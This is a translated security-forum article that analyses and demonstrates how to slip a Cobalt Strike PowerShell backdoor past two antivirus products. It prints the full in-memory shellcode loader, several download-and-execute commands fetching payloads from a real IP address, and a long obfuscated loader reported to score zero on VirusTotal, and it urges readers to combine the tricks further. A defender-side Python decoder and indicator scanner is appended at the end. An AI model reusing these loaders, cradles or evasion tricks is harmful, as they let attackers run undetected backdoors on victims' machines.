Analysis of PowerShell AV-evasion techniques
============================================

Preface
-------

PowerShell, as a package bundled with Microsoft Windows, is extremely powerful. Windows PowerShell is a command-line shell and scripting environment that lets command-line users and script authors use the .NET Framework, and it has become widespread among IT and system administrators. Its key characteristics can be summed up as: convenient, effective and stealthy. For example, using such legitimate tools lets threat activity blend in with normal network traffic or IT/system-administration work, and it leaves fewer traces, which makes detection harder. After all kinds of transformation, encryption and obfuscation, with the malicious file hosted on a remote server and downloaded straight into memory for execution, defending against it remains technically difficult, and PowerShell backdoors and cryptominers are drawing more and more attention. In internal-network penetration testing, AV evasion (免杀) is especially important. When learning evasion, people often fall into a trap: they reproduce a tutorial step by step without understanding what it is actually saying, knowing only that "it evades"; once that trick gets detected, they are stuck, because they never understood the reasoning behind it. As the saying goes, give a man a fish and you feed him for a day; teach him to fish and you feed him for a lifetime. So in what follows I will take a backdoor generated by Cobalt Strike (CS) and analyse how two mainstream domestic AV products detect it. I'll call them AV-R and AV-60 (某绒 and 某60 in the original).

Prerequisites
-------------

**PowerShell execution policy**

```powershell
powershell.exe Get-ExecutionPolicy   # show the current execution policy
# Restricted:   scripts cannot run (the default)
# RemoteSigned: locally created scripts may run; scripts downloaded from the internet may not (unless signed with a digital certificate)
# AllSigned:    scripts run only if signed by a trusted publisher
# Unrestricted: all scripts may run
Set-ExecutionPolicy <Policy name>    # set the execution policy
```

**For commonly used PowerShell parameters see:** [https://blog.csdn.net/qq\_51524329/article/details/121579801](https://blog.csdn.net/qq_51524329/article/details/121579801)

**The main questions an evasion technique has to answer:**

1. Under what conditions does the evasion tool execute?
2. How large is the file?
3. Does it still work normally (here: does the beacon still check in)?

Analysis of the PowerShell evasion process
==========================================

CS generates a PowerShell backdoor; AV-R and AV-60 both detect it immediately.

```powershell
Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

# the shellcode itself (the base64 blob is elided on this page)
[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

# XOR-decode it with the key 35
for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

# resolve VirtualAlloc through reflection, allocate RWX memory, copy the shellcode in and call it
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@   # shellcode loader

# execute the loader (in a 32-bit job when running under 64-bit PowerShell)
If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}
```

### Local execution: encoding analysis

Local execution means uploading the PowerShell script directly to the target server and running it there. What is the first thing to do? Locate the signature, of course. What is a signature? A signature is a characteristic unique to the malware; AV software generally detects by signatures. Signature detection is a direct pattern-matching approach that precisely searches for a set of matching strings; the characteristics of each virus and its variants are stored in the scanner's definition database, and these characteristics do not appear in uninfected files.

How do you locate a signature in a PowerShell script by hand? Delete the code piece by piece and scan with the AV after each deletion; that pins down the signature (the same way you locate signatures in an exe). In this script the AV mainly flags the content of the `$DoIt` variable. Pay particular attention to which base64 encoder you use: the output of some online encoders will not execute.

In the version below, `$DoIt` holds the base64 encoding of the original script. It is decoded with `[System.Convert]::FromBase64String` and assigned to `$mksec`. Why decode it at all? Because if the base64 variable were passed straight to the execution statement, would it run? Obviously not, so it has to be decoded first, and the `$DoIt` in the execution block has to be changed to `$mksec`.

```powershell
Set-StrictMode -Version 2
$DoIt = @'
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
'@
# the block above is the base64 encoding of the original script
$mksec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))   # base64-decode $DoIt into $mksec

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $mksec | wait-job | Receive-Job
}
else {
	IEX $mksec
}
```

Scanning this script: AV-R detects it, AV-60 does not, and the beacon checks in successfully. I won't include screenshots, because there are many more attempts below and a screenshot for every single scan would be tedious to look at. What does this tell us? AV-R's static-code detection is strong, and AV-60's static-code detection is weak.

#### Remote download and execute: replacement, splitting and junk

What remote download and execute means:

[![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-4a328dc322b753f57d066188778390be3d1b3480.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-4a328dc322b753f57d066188778390be3d1b3480.png)

**Remote execution**

Host the PowerShell backdoor script above on our server and run the following command on the target server:

```powershell
# download the PowerShell script and run it with a hidden window
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.113.217.128/payload.ps1'))"
```

AV-R detects it immediately, and so does AV-60.

**Renaming the file**

What is this about? Copy the contents of powershell.exe into a text file; that text file is then equivalent to powershell.exe.

```powershell
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
bypass.txt -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.113.217.128/payload.ps1'))"
```

This gets past AV-R and the beacon checks in; AV-60 detects it.

**Splitting the http**

Split `http` across variables, then concatenate them to download and execute:

```powershell
powershell -nop -w hidden -c "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.113.217.128/payload.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
```

This gets past AV-R and the beacon checks in; AV-60 detects it.

**Combining both**

What happens if we combine the two methods above?

```powershell
bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.113.217.128/payload.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
```

This gets past AV-R and the beacon checks in; AV-60 detects it.

**Adding junk characters**

```powershell
powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://47.113.217.128/payload.ps1')
```

This gets past AV-R and the beacon checks in; AV-60 detects it.

What happens if I combine all three methods? The evasion mindset is to keep trying and keep thinking.

```powershell
bypass.txt -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://47.113.217.128/payload.ps1')
```

This gets past AV-R and the beacon checks in; AV-60 detects it.

After the analysis above you should have a rough idea of the evasion mindset. In the tests above we only hosted the unencoded PowerShell backdoor on our server and then downloaded and executed it. What happens if I host the encoded version instead? I tried that too, and the results were the same as above. What does this phenomenon tell us? It shows that during remote download-and-execute, the AV is not scanning the code on our server; it is inspecting the powershell process. Why do I say that? Because the code hosted on our server could not bypass AV-R. At the same time we can see that AV-R's process detection is mediocre, while AV-60's process detection is strong. Don't worry, we'll keep trying other methods below.

Remote download and obfuscated encoding
---------------------------------------

Our initial base64 encoding was far too simple as obfuscation. Is there a tool that can encode and obfuscate PowerShell well and produce genuinely complex obfuscation? Here I introduce a tool dedicated to encoding and obfuscating PowerShell scripts.

Invoke-Obfuscation
Download: <https://github.com/danielbohannon/Invoke-Obfuscation>

**Basic usage:**

```powershell
# install and load
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
# process a file:
set scriptpath C:\Users\86135\Desktop\1.ps1
# process inline code:
set scriptblock 'xxxx'
# enter the encoding menu:
encoding
# pick an encoding: 1-8 (there are eight encoding schemes)
# write the output file:
out C:\Users\acer\Desktop\11.ps1
```

Even the tool itself gets detected. Why would the tool be detected? Keep reading; I'll explain everything later.

[![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-a52d660aa5dcc84230e58e51a5ccbdfa757feb22.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-a52d660aa5dcc84230e58e51a5ccbdfa757feb22.png)

Encode its source:

[![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-5efe30b4e70f7f7772031614feb00230ea85f3bf.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-5efe30b4e70f7f7772031614feb00230ea85f3bf.png)

Pick any encoding and look at the output. The obfuscated code is extremely complex; we generally could not produce anything this convoluted by hand. (Obfuscated output omitted.)

Scanning it at this point: AV-60 passes, AV-R does not. After the first encoding pass 360 was bypassed but Huorong still was not; after a second encoding pass AV-60 passes and AV-R still does not. (Second-pass output omitted.)
111@109{66o97d115;101j54V52V83<116t114j105>110<103t40{39{51;56o117<113t73<121d77{106@81<54j114<71<69o118>70@72@113t72V69d84V113@72t69d118@113>72j69{51t113o70t69{76@76<74t82V112;66t82>76d99>69@117;79;80<72;48d74{102V73o81o56t68>52@117<119t117d73;117j84V66;48@51V70@48{113@72;69o122@113<71o69@102t73j118t79t111d89t49>117{109{52<49@100;112<73<118>78@122j113d71j115V55j113o72t115j68{73j118@68;65{72{50V113>111d70d54<103V105V57o82;76{99<69d117o79<80d52@117<119{117t73>117o81;98o119o49t98<88j73;70<55@98@71>70d52d72@86j115{70t55@113V72@115@72;73@118d66>70@113{67j57<111{113t72d115d47t73j118j67{111j74<54>103t105t56V54{112>110d66;119o100;52o101j69j74;54d101>88>76;99t119@51{116t56<101t97o103d120;121o75V86>43d83{48@49{71t86;121V78j76d86o69<112t78o83>110j100>76t98>49<81V70V74d78;122>50o69<116;120;48d100o72;82@48>100t69t115j90j100>86;113@69t51d80V98o75j112>121{77o106t73>51j103d83d54@110o74V121<83V83<66<121@99t107j117V100j78>105;77{106V99t72@78>76V100t75d113;56;53d100<122o50j121t70>78j52o69<118V70@120<83d121t77;104;89d54o100@120j99{88d70@119d99d88o78t76{121<72j89{78>71d78t122{50<113{117V87<103j52o72<77{83@51d72@82V48j83j100V120t119>100d85<115<79V74>84j116;89t51<80j97d109>52t121t121{110@52{67t73>106@73<120t76d99{112V116<86<88o74;54{114{97j121j67V112<76j105d101;98<66@102>116>122V50;113<117d74@76o90V103<74<57;69{116{122;50{69j116;120<48>83d83{82@121@100V88>78d76<108{72d84V68{75V78o122t50o110>67@77@77t73@121d77{97d53{70{101d85o69V116V122V75j115o105t73V106o73d56>114j113@73@105<77t106j121t54V106{99V51;78<119o77;86j50@104o109o101@121<79<77{73<72d102d83<43o114V117o71<101;105<90{114;68;76j115@115;99{86j117o50t97t52>70j114{70@43>70V53o76j86<48>105j65>82@120o53j111V73j86o87V115t53t116@74>97V56;57{102>122<56t47<53{81t108>120>75V72d111d83>118@66>97{97;115{71t89V53>57t98{119d78d79V56t54>113j71d114j98j65{87d77o52>54>77d83o68;77d54<105j72<47<43;112@78{70o107d73t51{90o81;82V108;69d79<89j107t82j71@84t86o99;90t65>50{53<77j87j85d112j80@84j48;73V77j70t103j48<84V65@119@116>65d84V69;53V84;81<108;100{75;81;85
{57d71o71t65o78@117;99@71@112>109o65>120j73>84t68@82;77{89d65o51<82>75j84{85o100@77>86t70j65<68>98o88@99d68d70V81o48t82;71j65d78V48;98V72d81V86{70{120V103o68o100<49d70@75;82>48;90d78@86d119d119d86o68{82{77;89d65d50t53>105V100o50d70V112d99t65;111@117>75j83<80@50<87o118{82<82@53{121;52;52;85;54t74t105V69<73o104t113j97>56j50<122j115d102;71j100<102j99d109o47t80o73d85;99>76o47t89o110@109@43t119<80{109>69<51<89@55o82V74@49t122o70@74d49>102;120;89;57j81t48@71{101<54t105;114j85d109d72j88>74@120<103>113<78o120{121;50;90;117@43@76V72;81@88o90o82;55j122;56t104{51V111d122t105;105<114o117t86j54j71t56o103t77j122V102;121o106V117o85d115V120{115t102;54d51V97@71j112o79d113d112>78>47{82{82@106;81{54;100<98@107d108>118;56>88>48d102t56V122<65@97<118j80d98V90d50{113;112@111V53j65<113V111o114@70;74t114d110{88V54o121;102;113o97j90o117d101{106@84j70>115;47o87@50<119>67d65@79t80{115{111o120o69j68o82>70o115j104@100d115V112V76{70V98d98@106d71d67d116{68j66{102<105{119{75j84>106d109;80{110@49o87o56{53d55<112V84V86<75V104<117{114;50<49<113;113o69;110t89<74V47;119V77@74V107d89@70j68j113>77@47d75@43;43j103j68{109d111d68o90o100t115<67j65;53t101{77t56j118;79<52d76>71t57t103d122@57d76d70j67o66>57;100>100@101V71<70o119d97j105V78d76j48@53o97j66@100d100;122;50V83{87t78>76V73;122@77>106<73o48;115@106j73>50d77;106{100t69V116t55{104<51{68d71V51{80>97V119o109j105<77o106{73V121@77t105>43d110o74{119t113d115j82;48t83>121t77V68<73o121o78d119j100>85o115;120t116{97{114<66@51{80<97;109j52t49V102>108d113t67;81>105{52j75o98>106@86t115t90d55{52j77t117@75j51{116<122t99@70>120o81{78<69{104@73<81;68j82j69t83d70<65o48j83V69@82;115t106j77o82d100V49j87j119{61o61@39<41>10o10;102>111V114V32@40@36d120;32@61o32o48@59o32o36@120>32@45j108>116<32d36{118d97@114d95j99{111t100;101@46<67j111>117o110>116V59>32;36d120<43<43{41;32V123t10V9<36{118<97V114t95V99@111V100o101>91t36t120o93>32j61t32{36o118{97t114@95V99t111j100{101{91;36@120j93;32{45@98<120;111<114<32t51t53@10d125@10o10d36{118{97o114;95t118{97<32{61@32>91;83j121@115;116{101>109{
46@82>117;110t116<105d109t101;46>73>110{116>101o114<111@112o83<101{114V118{105;99o101V115j46d77d97;114d115@104j97<108t93>58;58<71@101<116@68o101d108<101{103;97t116;101V70{111d114{70@117V110@99t116>105;111>110j80j111V105t110d116;101j114o40>40t102t117o110t99o95d103d101V116>95;112{114o111;99{95V97@100{100d114V101;115{115<32j107d101d114{110t101V108V51j50<46V100j108V108d32>86{105V114@116j117;97;108>65t108@108o111>99;41;44@32>40{102d117j110t99V95d103<101@116;95;100>101t108{101V103@97<116t101<95<116<121d112>101{32o64j40;91@73>110d116>80{116>114j93j44t32j91o85V73d110>116d51{50V93;44j32t91<85j73@110>116>51{50o93@44t32o91j85@73@110o116d51j50{93o41t32{40>91o73@110@116;80>116;114;93<41>41t41d10V36<118d97@114t95t98o117j102<102j101<114o32j61d32o36V118;97o114@95;118@97<46@73V110<118<111>107d101<40o91V73d110>116>80{116d114@93o58@58>90j101<114t111t44j32;36;118;97j114{95;99j111d100@101>46d76t101>110t103j116t104>44j32t48d120t51{48{48t48o44t32d48j120j52>48<41@10t91<83j121t115{116j101;109{46@82d117;110t116>105o109{101d46>73V110;116@101;114@111{112@83t101j114t118;105d99;101V115o46t77t97@114{115t104o97;108@93d58<58j67V111d112j121>40>36V118@97d114{95j99t111V100V101j44<32;48d44o32o36j118;97@114@95o98V117o102t102>101o114t44V32>36>118j97d114@95<99>111d100@101j46V108V101{110{103j116@104V41t10V10t36>118@97o114t95o114V117<110t109d101<32;61o32t91t83@121d115@116V101o109j46;82V117;110{116o105j109j101j46V73{110<116o101t114V111d112{83V101j114@118<105@99{101o115;46<77V97@114d115t104t97t108j93>58V58V71;101{116;68;101j108{101;103V97@116<101;70{111t114j70<117d110j99j116;105j111V110o80@111<105d110V116d101d114<40j36o118t97d114{95>98<117d102@102@101t114V44;32<40V102{117<110@99>95{103o101{116t95;100@101V108d101j103V97{116<101<95{116>121<112{101;32j64@40>91;73o110o116j80t116{114>93{41j32t40j91;86d111>105t100j93j41o41{41;10j36j118;97@114j95{114{117<110o109j101j46d73V110{118o111V107o101t40{91j73j110d116V80d116{114@93@58@58@90@101j114@111V41;10<39>64V10t10>73o102o32>40V91d73<110d116;80V116<114V93<58V58@115o105<1
22d101o32t45{101d113t32{56V41o32<123o10<9@115{116{97j114{116o45<106d111@98t32o123{32<112{97;114;97o109<40d36t97{41V32o73V69j88>32o36t97@32{125@32>45t82o117;110t65>115d51V50t32{45;65j114o103V117@109{101o110V116>32t36o68<111<73j116o32d124t32<119<97;105d116j45o106j111o98t32o124>32t82<101V99@101{105;118V101V45o74o111j98;10@125t10>101d108<115o101V32<123@10d9j73t69<88{32<36>68d111V73o116;10o125{10'-SPlit'd'-sPlIt '>'-sPLIT 'j' -SpLIT 'o' -SpLIt't'-SPLiT'V' -SPliT';' -splIT'{' -SPLIT'@'-SplIT'<' |%{([inT]$_ -AS[cHar])} )+"$(SET-ITeM 'vaRiaBLE:ofS' ' ') ")
```

What does the experiment above tell us? First, why is the tool itself detected? Because the tool has already been added to the antivirus signature database, so it is flagged; and a PowerShell script that has been obfuscated and encoded with that tool is still detected, because the antivirus recognises that the encoded content was produced by that tool and flags it as well. This is the same reason that the traffic and other characteristics of tools such as Chopper (菜刀), AntSword (蚁剑) and sqlmap have been explicitly added to antivirus signature databases, so those tools get blocked. So the question is: if it gets detected anyway, what is the point? Let's change the approach. Above we encoded the entire PowerShell script; what happens if only part of the code is encoded?

At this point the approach I used was to place the base64-encoded shellcode from the very first step on a remote server, then download and execute it. The code is as follows:

```powershell
Set-StrictMode -Version 2
$DoIt= ((New-Object System.Net.Webclient).DownloadString('http://47.113.217.128/ssyy.txt')) # of course the HTTP part could also be split up here
$mksec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $mksec | wait-job | Receive-Job
}
else {
IEX $mksec
}
```

What is the result now? 某绒 no longer flags it, but 某60 (the two anonymised domestic AV products) still blocks it at execution time. The next step is to use the Invoke-Obfuscation tool to partially encode some of the code above: I used the tool to try encoding each segment in turn, and after processing `start-job { param($a) IEX $a } -RunAs32 -Argument $mksec | wait-job | Receive-Job`, 某60 was successfully bypassed and the beacon checked in.

Here I chose the fifth option for encoding; try the others yourself, since there are far too many possibilities.

[![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-96049f971dc326b9e4c8fc18105863d90784e675.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-96049f971dc326b9e4c8fc18105863d90784e675.png)

The code is as follows:

```powershell
Set-StrictMode -Version 2
$DoIt= ((New-Object System.Net.Webclient).DownloadString('http://47.113.217.128/ssyy.txt'))
$mksec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))
If ([IntPtr]::size -eq 8) {
(
[RuNtime.INtERopserVIces.mArShAL]::([RunTiME.inTEROPservICeS.marshAL].GETmEmberS()[3].NAME).iNvOKe([RuNtImE.InteropSeRViCeS.MarSHAl]::SecUreSTriNGToBsTR( $('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'|coNVERtTO-SeCuReSTrinG -k (40..63)) ) ))| .((Get-VarIABlE '*mDr*').nAME[3,11,2]-JOIn'')
}
else {
IEX $mksec
}
```

Taken to VT for scanning at this point, the result came back as 0.

[![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-717d05420745420dc63ec6c085c6c443162bce28.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-717d05420745420dc63ec6c085c6c443162bce28.png)

One point worth emphasising: many articles introduce various evasion tools, and many of those tools are already in antivirus signature databases. Using the approach above with them may produce unexpected results.

Summary
--

[![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-488d8295779caeee1328b597789f0c24f3b2445d.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-488d8295779caeee1328b597789f0c24f3b2445d.png)

What should we take away from the analysis above? It is not enough to simply reproduce it once, because evasion is only temporary: once a technique is published it is quickly added to signature databases. What we need is a clear understanding of the evasion methods above and the ability to combine several of them, just as CORS + XSS are chained in web attacks to increase impact. The same goes for evasion: permuting and combining these ideas yields a very large number of variants. In the final example I had not even merged all of the methods, and the VT result was already 0; what would happen if all of them were combined? Try it yourself. Evasion is a process of continuous trial, so be willing to experiment. I hope this article also helps you reason by analogy when working with other languages.
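From the defender's side, the first layer the article relies on (every character of the script replaced by its decimal code point, the codes joined with random delimiters, then `-split` on each delimiter and `[int]$_ -as [char]` to rebuild the text) is easy to peel off, and doing so exposes the download cradle, base64 decode and `IEX` that the encoding was meant to hide. The following Python is an added example written for this page, not code from the article or from Invoke-Obfuscation: it rebuilds that layer on a constructed, harmless one-line script, decodes it back, and runs a small indicator scan over both the raw and the decoded text. The function names, indicator list and sample script are assumptions of this example; the inner `-bxor` shellcode layer seen on the page is deliberately not handled here.

```python
"""Analyst-side decoder for the char-code + delimiter -split layer shown on this
page, plus an indicator scan. Added example; names and sample are constructed."""
import re

# Constructed, harmless inner script used to build the sample (not the article's beacon).
SAMPLE_INNER = "Write-Output 'hello'; $v = [Convert]::FromBase64String('QUJD')"

# Delimiter set modelled on the one visible on the page ('d', 'j', '>', 'o', 'V', ...).
SAMPLE_DELIMS = "dj>oV;{@<t"


def encode_like_page(script: str, delimiters: str = SAMPLE_DELIMS) -> str:
    """Re-create the layer from the page: each character becomes its decimal code
    point and consecutive codes are joined by one delimiter, cycling through the
    set deterministically so the round trip can be tested."""
    parts = []
    for i, ch in enumerate(script):
        parts.append(str(ord(ch)))
        parts.append(delimiters[i % len(delimiters)])
    body = "".join(parts[:-1])  # drop the trailing delimiter
    splits = "".join(f"-SplIT'{d}'" for d in delimiters)
    return f"('{body}'{splits} |%{{([inT]$_ -AS[cHar])}})"


# Case-insensitive because the tool randomises the casing of -split.
SPLIT_RE = re.compile(r"-split\s*'([^']*)'", re.IGNORECASE)


def decode_char_split(obfuscated: str):
    """Recover the plaintext from a  '<codes>' -split 'a' -split 'b' ... | %{[int]$_ -as [char]}
    construct. Returns None when the pattern is not present or does not decode."""
    body_match = re.search(r"'([0-9][^']*)'", obfuscated)  # quoted string starting with a digit
    delims = SPLIT_RE.findall(obfuscated)
    if not body_match or not delims:
        return None
    # PowerShell applies the -split operators in sequence; splitting on the whole
    # delimiter set at once yields the same tokens.
    pattern = "[" + "".join(re.escape(d) for d in delims) + "]"
    tokens = [t for t in re.split(pattern, body_match.group(1)) if t]
    try:
        return "".join(chr(int(t)) for t in tokens)
    except ValueError:
        return None


# Behaviours worth alerting on in a PowerShell script, raw or decoded.
INDICATORS = {
    "download-cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b", re.I),
    "base64-decode": re.compile(r"FromBase64String", re.I),
    "dynamic-invoke": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "memory-exec": re.compile(r"VirtualAlloc|GetDelegateForFunctionPointer|Marshal\]::Copy", re.I),
    "xor-decode": re.compile(r"-bxor", re.I),
    "arch-pivot": re.compile(r"-RunAs32", re.I),
    "char-split-encoding": re.compile(
        r"-split\s*'.'.*\[\s*int\s*\]\s*\$_\s*-as\s*\[\s*char\s*\]", re.I | re.S),
}


def scan(script: str) -> list:
    """Return the sorted indicator names found in the script, checking both the raw
    text and (if present) the decoded char-split layer so encoding does not hide them."""
    layers = [script]
    decoded = decode_char_split(script)
    if decoded:
        layers.append(decoded)
    return sorted(name for name, rx in INDICATORS.items()
                  if any(rx.search(layer) for layer in layers))


if __name__ == "__main__":
    sample = encode_like_page(SAMPLE_INNER)
    print("decoded :", decode_char_split(sample))
    print("findings:", scan(sample))
```

Running the block decodes the sample back to the original one-liner and reports `base64-decode` (visible only after decoding) together with `char-split-encoding` (visible in the raw text). The same decoder applied to the blob at the top of this page recovers the outer loader script; the XOR-encoded shellcode inside it stays encoded, which is the right place for an analyst to stop and hand the bytes to a sandbox rather than execute them.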
Published 2021-12-01 09:49:46
Category: Intranet penetration
Author: Honeypot (17 articles)